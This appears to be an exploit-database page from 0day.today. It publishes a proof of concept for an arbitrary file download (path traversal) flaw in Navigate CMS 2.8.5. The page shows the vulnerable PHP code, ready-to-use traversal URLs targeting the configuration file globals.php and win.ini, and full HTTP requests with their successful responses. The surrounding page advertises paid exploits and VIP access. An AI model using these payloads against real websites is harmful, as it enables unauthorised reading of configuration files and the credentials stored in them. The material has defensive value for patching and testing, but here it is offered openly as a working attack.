0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Navigate CMS 2.8.5 - Arbitrary File Download Vulnerability
# Exploit Title: Navigate CMS 2.8.5 - Arbitrary File Download # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.navigatecms.com/ # Software Link: http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8.5r1355.zip # Version: 2.8.5 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # Description # Profile type users+ can download arbitrary files. # http://TARGET/[PATH]/navigate_download.php?wid=1&id=[FILE] # # /* `exploitdb`.`nv_profiles` */ # $nv_profiles = array( # array('id' => '1','name' => 'Administrator','description' => '','menus' => '["2","3","4","6","1"]'), # array('id' => '2','name' => 'User','description' => 'Default Navigate CMS user profile','menus' => '["2","3","7"]') # ); # # navigate_download.php # ........ # $id = $_REQUEST['id']; # if(!empty($_REQUEST['id'])) # { # if(is_int($id)) # $item->load($id); # else # $item->load($_REQUEST['id']); # } # # if(!$item->id) # { # echo 'Error: no item found with id '.$_REQUEST['id'].'.'; # session_write_close(); # $DB->disconnect(); // we don't need the database anymore (we'll see) # exit; # } # # $website = new Website(); # if(!empty($_GET['wid'])) # ........ # http://TARGET/[PATH]/navigate_download.php?wid=1&id=../../../cfg/globals.php GET /[PATH]/navigate_download.php?wid=1&id=../../../cfg/globals.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bk1qlak7o03; NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; navigate-tinymce-scroll=%7B%7D Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 13 Oct 2018 12:36:12 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; path=/ Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET Set-Cookie: PHPSESSID=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:36:12 GMT; Max-Age=3600; path=/; domain=TARGET Expires: Sat, 20 Oct 2018 12:36:12 GMT Cache-Control: private Pragma: cache Etag: "Li4vLi4vLi4vY2ZnL2dsb2JhbHMucGhwLWdsb2JhbHMucGhwLTE1Mzk0MzQxNzItMTUzOTQzMjA3MC0w" Accept-Ranges: bytes Content-Disposition: inline; filename="globals.php" Last-Modified: Sat, 13 Oct 2018 12:01:10 GMT Content-Range: bytes 0-1847/1848 Content-Length: 1848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream # http://localhost/[PATH]/navigate_download.php?wid=1&id=../../../../../../../../Windows/win.ini GET /[PATH]/navigate_download.php?wid=1&id=../../../../../../../../Windows/win.ini HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: navigate-language=en; PHPSESSID=43c3fe79r969u85bk1qlak7o03; NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; navigate-tinymce-scroll=%7B%7D Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 13 Oct 2018 12:55:57 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; path=/ Set-Cookie: NVSID_ec36e8b8=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:55:57 GMT; Max-Age=3600; path=/; domain=TARGET Set-Cookie: PHPSESSID=43c3fe79r969u85bk1qlak7o03; expires=Sat, 13-Oct-2018 13:55:57 GMT; Max-Age=3600; path=/; domain=TARGET Expires: Sat, 20 Oct 2018 12:55:57 GMT Cache-Control: private Pragma: cache Etag: "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vV2luZG93cy93aW4uaW5pLXdpbi5pbmktMTUzOTQzNTM1Ny0xNTAxMTQ5NjkxLTA=" Accept-Ranges: bytes Content-Disposition: attachment; filename="win.ini" Last-Modified: Thu, 27 Jul 2017 10:01:31 GMT Content-Range: bytes 0-563/564 Content-Length: 564 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream # 0day.today [2025-01-06] #